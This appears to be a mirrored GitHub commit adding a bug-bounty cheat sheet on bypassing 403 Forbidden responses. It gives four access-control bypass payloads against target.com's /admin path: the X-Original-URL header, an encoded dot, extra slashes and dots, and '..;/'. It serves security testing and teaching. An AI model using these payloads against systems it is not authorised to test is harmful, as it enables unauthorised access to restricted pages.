ch0ic3/AllAboutBugBounty
1
0
Fork 0
mirror of https://github.com/daffainfo/AllAboutBugBounty.git synced 2025-02-22 14:43:44 +00:00
Code Issues Actions Packages Projects Releases Wiki Activity

Bypass 403 [1]

Browse Source 
Create how to bypass 403 Code and add 4 tips
This commit is contained in:
Muhammad Daffa 2020-09-09 21:53:05 +07:00 committed by GitHub
parent 89f37732a2
commit 4c32ea9202
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 42 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

42
Bypass403.md Normal file
View File

@ -0,0 +1,42 @@
# 403 Forbidden Bypass
1. Using "X-Original-URL" header
```
GET /admin HTTP/1.1
Host: target.com
```
Try this to bypass
```
GET /anything HTTP/1.1
Host: target.com
X-Original-URL: /admin
```
2. Appending **%2e** after the first slash
```
http://target.com/admin => 403
```
Try this to bypass
```
http://target.com/%2e/admin => 200
```
3. Try add dot (.) and slash (/) in the URL
```
http://target.com/admin => 403
```
Try this to bypass
```
http://target.com/admin/. => 200
http://target.com//admin// => 200
http://target.com/./admin/./ => 200
```
4. Add "..;/" after the directory name
```
http://target.com/admin
```
Try this to bypass
```
http://target.com/admin..;/
```